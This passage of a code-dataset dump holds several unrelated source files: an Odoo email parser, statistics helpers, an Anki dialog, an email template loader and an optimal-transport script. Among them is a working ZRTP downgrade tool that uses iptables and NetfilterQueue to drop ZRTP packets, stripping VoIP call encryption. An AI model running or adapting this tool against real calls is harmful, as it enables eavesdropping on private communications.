"usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 213, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 214, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 214, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 215, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 215, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 216, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 216, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 217, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 217, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 218, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 218, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 219, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 219, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 220, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 220, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 221, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 221, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 222, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 222, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 223, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 
223, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 224, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 224, "usage_type": "name"}, {"api_name": "utilities.setUpAdminHeaders", "line_number": 225, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 225, "usage_type": "name"}, {"api_name": "utilities.equals", "line_number": 226, "usage_type": "name"}, {"api_name": "utilities.equals", "line_number": 227, "usage_type": "name"}, {"api_name": "utilities.setUpAuthorizationErrorRequest", "line_number": 230, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 230, "usage_type": "name"}, {"api_name": "utilities.setUpUserHeaders", "line_number": 231, "usage_type": "call"}, {"api_name": "utilities.equals", "line_number": 231, "usage_type": "name"}, {"api_name": "data.setPresidentialElectionAdded", "line_number": 234, "usage_type": "argument"}, {"api_name": "data.setParliamentaryElectionAdded", "line_number": 235, "usage_type": "argument"}, {"api_name": "data.getPresidentialElection", "line_number": 241, "usage_type": "argument"}, {"api_name": "utilities.equals", "line_number": 241, "usage_type": "name"}, {"api_name": "data.getParliamentaryElection", "line_number": 242, "usage_type": "argument"}, {"api_name": "utilities.equals", "line_number": 242, "usage_type": "name"}, {"api_name": "utilities.runTests", "line_number": 248, "usage_type": "call"}]} +{"seq_id": "390487217", "text": "# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Odoo\n# Copyright (C) 2018 iCode ().\n#\n##############################################################################\n\nfrom odoo import api, fields, models, tools, exceptions\nimport logging\nimport re\nimport lxml\nfrom collections import namedtuple\n\n_logger = logging.getLogger(__name__)\n\n\nclass EmailParser(models.AbstractModel):\n _name = 'mail.survey_parser'\n MappingRulesRecord = namedtuple(\n 'MappingRulesRecord', 'field_name, inner_field_name, field_type'\n )\n\n @staticmethod\n def _parse_mail_to_dict(message=\"\"):\n \"\"\"\n function receives the message and returns a dictionary\n :param message: string\n :return: dict fields_found[field_name] = field_val\n \"\"\"\n # FIXME: Test this \n message = lxml.html.fromstring(message).text_content()\n # message = message.replace('
', '')\n        # message = message.replace('
', '')\n message_list = list(map(lambda x: x.strip(), message.split('-----')))\n\n fields_found = {}\n for line in [item for item in message_list if ':' in item]:\n field_name, field_val = list(\n map(lambda x: x.strip(), line.split(':', 1))\n )\n fields_found[field_name] = field_val\n return fields_found\n\n\nclass EmailSurvey(models.TransientModel):\n _name = 'mail.survey_model'\n _inherit = ['mail.thread', 'mail.alias.mixin', 'mail.survey_parser']\n _description = 'Form Message Parser'\n _mail_post_access = 'read'\n\n def get_or_create_contact(self, w_dict, rel_model='res.partner'):\n \"\"\"\n The function accepts values,\n checks the presence of a contact,\n or creates a new one if there is none.\n \"\"\"\n try:\n contacts = self.env[rel_model].search([])\n filtered_contacts = contacts.filtered(lambda r: r.email == w_dict['email'])\n if filtered_contacts:\n _logger.info('Contact exist')\n return filtered_contacts\n else:\n _logger.info('Create contact')\n partner_init = {\n 'name': w_dict['name'],\n 'email': w_dict['email'],\n 'phone': w_dict['phone']\n }\n return self.env[rel_model].create(partner_init)\n except:\n _logger.info('Something wrong')\n\n @api.model\n def message_new(self, msg_dict, custom_values=None):\n \"\"\" Overrides mail_thread message_new that is called by the mailgateway\n through message_process.\n This override updates the document according to the email.\n \"\"\"\n _logger.info('Start mail parsing')\n\n TARGET_MODEL = custom_values.pop('target_model', None)\n\n write_dict = self._parse_mail_to_dict(msg_dict.get('body'))\n lead = None\n\n _logger.info(\"Survey mail data:\\n{}\\n\".format(write_dict))\n\n partner = self.get_or_create_contact(write_dict)\n try:\n _logger.info(\"Creation lead for {}\".format(partner.email))\n opportunity_data = {\n 'name': write_dict['message'],\n 'contact_name': write_dict['name'],\n 'team_id': False,\n 'description': 'Created from questionnaire form',\n 'partner_id': partner.id,\n 'partner_name': write_dict['company-name'],\n 'email_from': write_dict['email'],\n 'phone': write_dict['phone'],\n }\n leads = self.env[TARGET_MODEL].search([])\n filtered_leads = leads.filtered(\n lambda r: r.name == write_dict['message'] and r.stage_id.probability != 100.0)\n if write_dict['message'] in leads.mapped('name') and partner.id in leads.mapped(\n 'partner_id.id') and filtered_leads:\n _logger.info(\"Lead {} already exists\".format(\n opportunity_data['name']\n ))\n lead = filtered_leads\n else:\n lead = self.env[TARGET_MODEL].create(opportunity_data)\n _logger.info(\"Lead {} for {} successfully created\".format(\n opportunity_data['name'],\n partner.email\n ))\n except:\n _logger.exception(\n \"Lead creation for {} failed.\".format(partner.email)\n )\n return lead\n\n\nclass WebFormSurvey(models.TransientModel):\n _name = 'mail.survey_website_form'\n _inherit = 'mail.survey_model'\n _description = 'Website Form Parser'\n _mail_post_access = 'read'\n\n @api.model\n def message_new(self, msg_dict, custom_values=None):\n custom_values.update(\n {\n 'target_model': 'crm.lead'\n }\n )\n return super(WebFormSurvey, self).message_new(msg_dict, custom_values)\n", "sub_path": "models/mail_parser.py", "file_name": "mail_parser.py", "file_ext": "py", "file_size_in_byte": 5012, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "odoo.models.AbstractModel", "line_number": 18, "usage_type": "attribute"}, 
{"api_name": "odoo.models", "line_number": 18, "usage_type": "name"}, {"api_name": "collections.namedtuple", "line_number": 20, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 32, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 32, "usage_type": "attribute"}, {"api_name": "odoo.models.TransientModel", "line_number": 46, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 46, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 75, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 75, "usage_type": "name"}, {"api_name": "odoo.models.TransientModel", "line_number": 125, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 125, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 131, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 131, "usage_type": "name"}]} +{"seq_id": "457698418", "text": "#!/usr/bin/env python3\n\nimport sys\nimport argparse\nimport subprocess\nfrom netfilterqueue import NetfilterQueue\n\n\nparser = argparse.ArgumentParser(\n description=\"A tool to downgrade ZRTP media stream to RTP, SRTP-SDES or SRTP-DTLS. Its vendor and configuration specific, which protocol will be used after downgrade.\"\n)\n\nparser.add_argument(\n '-i',\n dest=\"INTERFACE\",\n type=str,\n help=\"The interface on which the tool will listen on. If no interface is set, the tool will listen on all interfaces\"\n)\n\nparser.add_argument(\n '-v',\n action='store_true',\n help=\"Verbose mode\"\n)\n\nargs = parser.parse_args()\n\n\ndef check_payload(pkt):\n\n payload = pkt.get_payload()\n\n if b'\\x5a\\x52\\x54\\x50' in payload:\n print(\"\\033[1;32m[+]\\033[0m ZRTP packet seen and dropped for downgrade\")\n pkt.drop()\n\n else:\n if args.v:\n print(\n \"\\033[1;34m[*]\\033[0m Packet received, but it doesn't seems to be ZRTP\")\n\n pkt.accept()\n\n\ndef iptables():\n\n if args.INTERFACE:\n cmd = f\"iptables -I INPUT -p udp -j NFQUEUE --queue-num 1 -i {args.INTERFACE}\".split()\n subprocess.run(cmd, shell=False)\n cmd = f\"iptables -I FORWARD -p udp -j NFQUEUE --queue-num 1 -i {args.INTERFACE}\".split()\n subprocess.run(cmd, shell=False)\n\n else:\n cmd = \"iptables -I INPUT -p udp -j NFQUEUE --queue-num 1\".split()\n subprocess.run(cmd, shell=False)\n cmd = \"iptables -I FORWARD -p udp -j NFQUEUE --queue-num 1\".split()\n subprocess.run(cmd, shell=False)\n\n\nnfqueue = NetfilterQueue()\nnfqueue.bind(1, check_payload)\n\niptables()\n\nprint(\"\\033[1;34m[*]\\033[0m Start listening for incoming UDP packets ...\")\nprint(\"\")\n\ntry:\n nfqueue.run()\n\nexcept KeyboardInterrupt:\n cmd = \"iptables -D INPUT 1\".split()\n subprocess.run(cmd, shell=False)\n cmd = \"iptables -D FORWARD 1\".split()\n subprocess.run(cmd, shell=False)\n print('')\n\n", "sub_path": "tools/ZRTPDowngrade/zrtpdowngrade.py", "file_name": "zrtpdowngrade.py", "file_ext": "py", "file_size_in_byte": 1922, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 49, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 51, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 55, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 57, "usage_type": "call"}, {"api_name": "netfilterqueue.NetfilterQueue", "line_number": 60, "usage_type": "call"}, {"api_name": 
"subprocess.run", "line_number": 73, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "566417538", "text": "# This file contains miscellaneous helper functions and constants for the \n# covid_cogntition.py analysis script. I've palced these items in here to \n# increase readiability of the main script.\n#\ndef remove_unused_categories(df):\n\t\"\"\" Helper function to remove unused categories from all categorical columns\n\t\tin a dataframe. For use in chained pipelines.\n\t\"\"\"\n\tfor col in df.select_dtypes('category').columns:\n\t\tdf[col] = df[col].cat.remove_unused_categories()\n\treturn df\n\n# This a global variable that will track the data sample N though a\n# preprocessing pipeline.\nnprev = 0\n\ndef report_N(df, label='', reset_count=False):\n\t\"\"\" Helper function to report the size of a dataframe in a pipeline chain.\n\t\tOptionally, will print a label. Useful for logging/debugging. If \n\t\treset_count is true, then the global counter (used to calculate change\n\t\tin sample size) is reset to zero.\n\t\"\"\"\n\tglobal nprev\n\tif reset_count:\n\t\tnprev = 0\n\tncurrent = df.shape[0]\n\tdelta = ncurrent - nprev\n\tprint(f\"N = {ncurrent:5d}, {delta:+6d} ({label})\")\n\tnprev = df.shape[0]\n\treturn df\n\ndef set_column_names(df, new_names):\n\t\"\"\" Another helper function that sets the columns of a dataframe to the \n\t\tsupplied new names (a list-like of names).\n\t\"\"\"\n\tdf.columns = new_names\n\treturn df\n\nfrom IPython.display import SVG, display\nfrom os import path\ndef save_and_display_figure(figure, file_name):\n\t\"\"\" Save images in SVG format (for editing/manuscript) then display inside\n\t\tthe notebook. Avoids having to have multiple versions of the image, or \n\t\tmultiple ways of displaying images from plotly, etc.\n\t\"\"\"\n\tfull_file_name = path.join('.', 'images', f\"{file_name}.svg\")\n\tfigure.write_image(full_file_name)\n\tdisplay(SVG(full_file_name))\n\ndef pval_format(p):\n\t\"\"\" Formatter for p-values in tables.\n\t\"\"\"\n\tif p < 0.001:\n\t\treturn \"< 0.001\"\n\telse:\n\t\treturn f\"{p:.03f}\"\n\ndef bf_format(bf):\n\t\"\"\" Formatter for Bayes Factors in tables.\n\t\"\"\"\n\tif isinstance(bf, str):\n\t\tbf = float(bf)\n\tif bf > 1000:\n\t\treturn \"> 1000\"\n\telse:\n\t\treturn f\"{bf:.02f}\"\n\ndef ci_format(ci, precision=3):\n\t\"\"\" Formatter for confidence intervals, where ci is a 2-element array.\n\t\"\"\"\n\treturn f\"({ci[0]:.{precision}f}, {ci[1]:.{precision}f})\"\n\ndef styled_df(df, return_it=False):\n\t\"\"\" Styles a dataframe (df) for display.\n\t\"\"\"\n\tstyled_table = df.style.format(table_style)\n\tdisplay(styled_table)\n\tif return_it:\n\t\treturn styled_table\n\ndef save_and_display_table(df, fn):\n\t\"\"\" Styles a dataframe according to the rules below, and saves it as a \n\t\t.html file. Saving as .html so it's as close as possible to the final\n\t\tmanuscript format. 
Still haven't found a better way to do this...\n\t\"\"\"\n\twith open(f\"./tables/{fn}.html\", 'w') as wf:\n\t\twf.write(styled_df(df, return_it=True).render())\n\ntable_style = {\n\t'B': '{:.2f}',\n\t'tstat': '{:.2f}',\n\t'df': '{:.2f}',\n\t'p_adj': pval_format,\n\t'CI': ci_format,\n\t'dR2': '{:.3f}',\n\t'f2': '{:.3f}',\n\t'd': '{:.2f}',\n\t'BF10': bf_format,\n}", "sub_path": "covid_cognition/lib_utils.py", "file_name": "lib_utils.py", "file_ext": "py", "file_size_in_byte": 2899, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "name"}, {"api_name": "IPython.display.display", "line_number": 48, "usage_type": "call"}, {"api_name": "IPython.display.SVG", "line_number": 48, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "277719547", "text": "#!/usr/bin/env python\n\n# Create the \"largest club\" and \"most new members\" CSVs\n\nimport dbconn, tmutil, sys, os\n\n\ndef inform(*args, **kwargs):\n \"\"\" Print information to 'file' unless suppressed by the -quiet option.\n suppress is the minimum number of 'quiet's that need be specified for\n this message NOT to be printed. \"\"\"\n suppress = kwargs.get('suppress', 1)\n file = kwargs.get('file', sys.stderr)\n \n if parms.quiet < suppress:\n print >> file, ' '.join(args)\n\n### Insert classes and functions here. The main program begins in the \"if\" statement below.\n\nif __name__ == \"__main__\":\n \n import tmparms, argparse\n # Make it easy to run under TextMate\n if 'TM_DIRECTORY' in os.environ:\n os.chdir(os.path.join(os.environ['TM_DIRECTORY'],'data'))\n \n reload(sys).setdefaultencoding('utf8')\n \n # Handle parameters\n parms = tmparms.tmparms()\n parms.add_argument('--quiet', '-q', action='count')\n parms.add_argument('--netfile', default='netadd.csv', dest='netfile', type=argparse.FileType('w'), help=\"CSV file: net new members\")\n parms.add_argument('--bigfile', default='bigclubs.csv', dest='bigfile', type=argparse.FileType('w'), help=\"CSV file: active members\")\n # Add other parameters here\n parms.parse() \n \n # Connect to the database \n conn = dbconn.dbconn(parms.dbhost, parms.dbuser, parms.dbpass, parms.dbname)\n curs = conn.cursor()\n \n # Main program begins here.\n\n # First, deal with net adds\n # Get the top ten (with ties)\n parms.netfile.write('Club Name,Members Added\\n')\n curs.execute(\"select clubname, activemembers - membase as net from clubperf where entrytype = 'L' having net > 0 and net >= (select min(net) from (select activemembers - membase as net from clubperf where entrytype = 'L' order by net desc limit 10) m) order by net desc, clubname\")\n for l in curs.fetchall():\n parms.netfile.write('%s, %d\\n' % (l[0].replace(',',';'), l[1]))\n parms.netfile.close()\n \n # And now, the biggest clubs\n parms.bigfile.write('Club Name,Active Members\\n')\n curs.execute(\"select clubname, activemembers from clubperf where entrytype = 'L' having activemembers >= (select min(activemembers) from (select activemembers from clubperf where entrytype = 'L' order by activemembers desc limit 10) m) order by activemembers desc, clubname\")\n for l in curs.fetchall():\n parms.bigfile.write('%s, %d\\n' % (l[0].replace(',',';'), l[1]))\n parms.bigfile.close() \n \n # And that's it.\n", "sub_path": "clubsizes.py", "file_name": "clubsizes.py", "file_ext": "py", 
"file_size_in_byte": 2542, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "sys.stderr", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tmparms.tmparms", "line_number": 30, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 32, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 33, "usage_type": "call"}, {"api_name": "dbconn.dbconn", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "194731040", "text": "from aqt import mw\r\nfrom aqt.qt import *\r\nfrom .ui import QHSeparationLine\r\n\r\nclass DlgConfig(QDialog):\r\n def __init__(self, config):\r\n super(DlgConfig, self).__init__(mw)\r\n self.setWindowTitle('Audio Files')\r\n self.setWindowFlags(Qt.Dialog)\r\n\r\n self._dir = QLineEdit()\r\n self._dir.setText(config['dir'] if 'dir' in config else '')\r\n self._dir.textChanged.connect(lambda v: self._setConfigValue(config, 'dir', v))\r\n self._dir.setToolTip('directory to copy sound data to')\r\n\r\n self._random = QComboBox()\r\n self._random.addItem('use field text', None)\r\n self._random.addItem('random', 'random')\r\n self._random.setCurrentIndex(1 if 'filenames' in config and config['filenames'].lower() == 'random' else 0)\r\n self._random.currentTextChanged.connect(lambda v: self._setConfigValue(config, 'filenames', v))\r\n\r\n self._use_selection = QCheckBox()\r\n self._use_selection.setText('search using selected text?')\r\n self._use_selection.setChecked(config['use_selection'] if 'use_selection' in config else False)\r\n self._use_selection.toggled.connect(lambda v: self._setConfigValue(config, 'use_selection', v))\r\n\r\n buttonBox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\r\n buttonBox.accepted.connect(self.accept)\r\n buttonBox.rejected.connect(self.reject)\r\n\r\n layout = QGridLayout()\r\n layout.addWidget(QLabel('Copy to: '), 0, 0)\r\n layout.addWidget(self._dir, 0, 1, 1, 2)\r\n layout.addWidget(QLabel('Filenames: '), 1, 0)\r\n layout.addWidget(self._random, 1, 1, 1, 2)\r\n layout.addWidget(self._use_selection, 2, 1, 1, 2)\r\n\r\n row = 3\r\n for name in config['sources']:\r\n row = self._addSourceConfig(layout, row, name, config['sources'][name])\r\n \r\n layout.addWidget(QHSeparationLine(), row, 0, 1, 3)\r\n layout.addWidget(buttonBox, row + 1, 0, 1, 3)\r\n self.setLayout(layout)\r\n\r\n def _addSourceConfig(self, layout, row, name, config):\r\n enabled = QCheckBox()\r\n enabled.setChecked(config['enabled'])\r\n enabled.toggled.connect(lambda v: self._setConfigValue(config, 'enabled', v))\r\n\r\n layout.addWidget(QHSeparationLine(), row, 0, 1, 3)\r\n row = row + 1\r\n layout.addWidget(QLabel(name), row, 0)\r\n layout.addWidget(QLabel('enabled?'), row, 1)\r\n layout.addWidget(enabled, row, 2)\r\n row = row + 1\r\n for key in config.keys():\r\n if key != 'enabled':\r\n attribute = QLineEdit()\r\n attribute.setText(config[key])\r\n attribute.textChanged.connect(lambda v: self._setConfigValue(config, key, v))\r\n\r\n layout.addWidget(QLabel(key), row, 1)\r\n layout.addWidget(attribute, row, 2)\r\n row = row + 1\r\n return row\r\n\r\n def _setConfigValue(self, config, 
key, value):\r\n config[key] = value\r\n", "sub_path": "audiofiles/src/main/python/dlgconfig.py", "file_name": "dlgconfig.py", "file_ext": "py", "file_size_in_byte": 2977, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "aqt.mw", "line_number": 7, "usage_type": "argument"}, {"api_name": "ui.QHSeparationLine", "line_number": 42, "usage_type": "call"}, {"api_name": "ui.QHSeparationLine", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "187535046", "text": "# encoding: utf-8\nfrom __future__ import unicode_literals\nimport logging\nfrom os import path\nfrom zipfile import ZipFile\n\nfrom emails.compat import to_unicode, string_types\n\n# FileSystemLoader adapted from jinja2.loaders\n\nclass FileNotFound(Exception):\n pass\n\ndef split_template_path(template):\n \"\"\"Split a path into segments and perform a sanity check. If it detects\n '..' in the path it will raise a `TemplateNotFound` error.\n \"\"\"\n pieces = []\n for piece in template.split('/'):\n if path.sep in piece \\\n or (path.altsep and path.altsep in piece) or \\\n piece == path.pardir:\n raise FileNotFound(template)\n elif piece and piece != '.':\n pieces.append(piece)\n return pieces\n\ndef open_if_exists(filename, mode='rb'):\n \"\"\"Returns a file descriptor for the filename if that file exists,\n otherwise `None`.\n \"\"\"\n try:\n return open(filename, mode)\n except IOError as e:\n if e.errno not in (errno.ENOENT, errno.EISDIR):\n raise\n\n\nclass BaseLoader(object):\n\n def __getitem__(self, filename):\n try:\n contents, _ = self.get_source(filename)\n return contents\n except FileNotFound:\n return None\n\n def find_index_file(self, filename=None):\n #print __name__, \"BaseLoader.find_index_file\", filename\n if filename:\n if self[filename]:\n return filename\n else:\n raise FileNotFound(filename)\n\n html_files = []\n index_html = None\n\n for filename in self.list_files():\n\n f = path.basename(filename).lower()\n\n #print __name__, \"BaseLoader.find_index_file\", filename, f\n\n if f.endswith('.htm') or f.endswith('.html'):\n if f.startswith('index.'):\n return filename\n else:\n html_files.append(filename)\n\n if html_files:\n return htmlfiles[0]\n\n raise FileNotFound('index html')\n\n\nclass FileSystemLoader(BaseLoader):\n \"\"\"Loads templates from the file system. 
This loader can find templates\n in folders on the file system and is the preferred way to load them.\n\n The loader takes the path to the templates as string, or if multiple\n locations are wanted a list of them which is then looked up in the\n given order:\n\n >>> loader = FileSystemLoader('/path/to/templates')\n >>> loader = FileSystemLoader(['/path/to/templates', '/other/path'])\n\n Per default the template encoding is ``'utf-8'`` which can be changed\n by setting the `encoding` parameter to something else.\n \"\"\"\n\n def __init__(self, searchpath, encoding='utf-8', base_path=None):\n if isinstance(searchpath, string_types):\n searchpath = [searchpath]\n self.searchpath = list(searchpath)\n self.encoding = encoding\n self.base_path = base_path\n\n def get_source(self, template):\n\n if self.base_path:\n name = path.join(self.base_path, template)\n\n pieces = split_template_path(template)\n for searchpath in self.searchpath:\n filename = path.join(searchpath, *pieces)\n f = open_if_exists(filename)\n if f is None:\n continue\n try:\n contents = f.read().decode(self.encoding)\n finally:\n f.close()\n\n return contents, filename\n\n raise FileNotFound(template)\n\n def list_files(self):\n found = set()\n for searchpath in self.searchpath:\n for dirpath, dirnames, filenames in os.walk(searchpath):\n for filename in filenames:\n template = os.path.join(dirpath, filename) \\\n [len(searchpath):].strip(os.path.sep) \\\n .replace(os.path.sep, '/')\n if template[:2] == './':\n template = template[2:]\n if template not in found:\n yield template\n\n\n\nclass ZipLoader(BaseLoader):\n\n def __init__(self, file, encoding='utf-8', base_path=None):\n self.zipfile = ZipFile(file, 'r')\n self.encoding = encoding\n self.base_path = base_path\n self.mapping = {}\n self._filenames = None\n\n\n def _decode_zip_filename(self, name):\n for enc in ('cp866', 'cp1251', 'utf-8'):\n try:\n return to_unicode(name, enc)\n except UnicodeDecodeError:\n pass\n return name\n\n\n def _unpack_zip(self):\n if self._filenames is None:\n self._filenames = {}\n for name in self.zipfile.namelist():\n decoded_name = self._decode_zip_filename(name)\n self._filenames[decoded_name] = name\n\n\n def get_source(self, name):\n\n logging.debug('ZipLoader.get_source %s', name)\n\n if self.base_path:\n name = path.join(self.base_path, name)\n logging.debug('ZipLoader.get_source has base_path, result name is %s', name)\n\n self._unpack_zip()\n\n if isinstance(name, str):\n name = to_unicode(name, 'utf-8')\n\n data = self.mapping.get(name, None)\n\n if data is not None:\n return data, name\n\n original_name = self._filenames.get(name)\n\n logging.debug('ZipLoader.get_source original_name=%s', original_name)\n\n if original_name is None:\n raise FileNotFound(name)\n\n data = self.zipfile.read(original_name)\n\n logging.debug('ZipLoader.get_source returns %s bytes', len(data))\n return data, name\n\n\n def list_files(self):\n self._unpack_zip()\n return sorted(self._filenames)\n\n\n", "sub_path": "venv/Lib/site-packages/emails-0.1.12-py2.7.egg/emails/loader/fileloader.py", "file_name": "fileloader.py", "file_ext": "py", "file_size_in_byte": 5738, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.path.sep", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.altsep", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 21, "usage_type": "name"}, 
{"api_name": "os.path.pardir", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "name"}, {"api_name": "emails.compat.string_types", "line_number": 93, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 137, "usage_type": "call"}, {"api_name": "emails.compat.to_unicode", "line_number": 147, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path", "line_number": 166, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 167, "usage_type": "call"}, {"api_name": "emails.compat.to_unicode", "line_number": 172, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 181, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 188, "usage_type": "call"}]} +{"seq_id": "175997862", "text": "import numpy as np\nimport tensorflow as tf\nimport cv2\nimport moviepy.editor as mvp\nfrom moviepy.video.io.ffmpeg_writer import FFMPEG_VideoWriter\n# note: conditionally imports networkx\n\nimport sinkhorn\n\n\ndef pairwiseSquaredDistances(clients, servers):\n cL2S = np.sum(clients ** 2, axis=-1)\n sL2S = np.sum(servers ** 2, axis=-1)\n cL2SM = np.tile(cL2S, (len(servers), 1))\n sL2SM = np.tile(sL2S, (len(clients), 1))\n squaredDistances = cL2SM + sL2SM.T - 2.0 * servers.dot(clients.T)\n return np.clip(squaredDistances.T, a_min=0, a_max=None)\n\n\n# Wasserstein_1, that is, L2 rather than squared L2.\ndef optimalMatching(latentPositions, natPositions):\n import networkx as nx\n\n distances = np.sqrt(pairwiseSquaredDistances(latentPositions, natPositions))\n n = distances.shape[0]\n bipartite = nx.Graph()\n bipartite.add_nodes_from(range(n), bipartite=0)\n bipartite.add_nodes_from(range(n, 2*n), bipartite=1)\n for i in range(n):\n for j in range(n):\n bipartite.add_edge(i, n+j, weight=-distances[i, j], near=False)\n matching = nx.algorithms.matching.max_weight_matching(bipartite, maxcardinality=True, weight='weight')\n m2 = [None for _ in range(n)]\n for a, b in matching:\n if a >= n:\n b, a = a, b\n latent_index = a\n nat_index = b - n\n m2[latent_index] = nat_index\n return m2\n\n\ndef grid(a, b):\n x = np.linspace(-1, 1, a)\n y = np.linspace(-1, 1, b)\n X, Y = np.meshgrid(x, y)\n XX = np.array([X.ravel(), Y.ravel()]).T\n return XX.astype(np.float32)\n\n\ndef main():\n n = 1000\n d = 20\n bs = 50\n assert n % bs == 0\n VIDEO_SIZE = 512\n minibatch_rounds = 30 * (n // bs)\n\n # first two coordinates are linearly transformed in an ad hoc way, rest simply multiplied by 2.\n start_np = np.random.normal(size=(n, d)).astype(np.float32)\n start_np *= 2\n start_np[:, 0] += start_np[:, 1]\n start_np += 2\n 
target_np = np.random.normal(size=(n, d)).astype(np.float32)\n\n one_dim_test = False\n if one_dim_test:\n # the simplest case where convergence to a suboptimal solution can be presented\n # is two 1d grids with different increments.\n start_np = (grid(n, 1) + 1.0) + np.array([-3, 0.0])\n target_np = (grid(n, 1) + 1.0) * 1.9 + np.array([0.0, 0.0]) \n\n assert start_np.shape == target_np.shape == (n, d)\n\n print(np.mean(target_np[:, :4], axis=0), \"\\n\", np.cov(target_np[:, :4].T))\n\n do_initial_matching = False\n do_rematching = False\n\n if do_initial_matching:\n initial_matching = optimalMatching(start_np, target_np)\n target_np = target_np[initial_matching]\n\n with tf.Session() as sess:\n pos = tf.Variable(start_np.astype(np.float32))\n target = tf.constant(target_np.astype(np.float32))\n mask = tf.placeholder(tf.float32, shape=(n, d))\n\n C = sinkhorn.pdist(pos, target) / (0.01) ** 2\n P, f, g = sinkhorn.Sinkhorn(C, n=n, m=n, f=None, epsilon=0.01, niter=10)\n\n # g = tf.matmul(P, target) * n - pos\n # next_pos = pos + 0.1 * g\n OT = tf.reduce_mean(P * C) * n\n\n optimizer = tf.train.AdamOptimizer(learning_rate=0.1)\n # optimizer = tf.train.GradientDescentOptimizer(learning_rate=1.0)\n\n grad_vars = optimizer.compute_gradients(OT)\n masked_gvs = [(mask * grad, var) for grad, var in grad_vars]\n train_step = 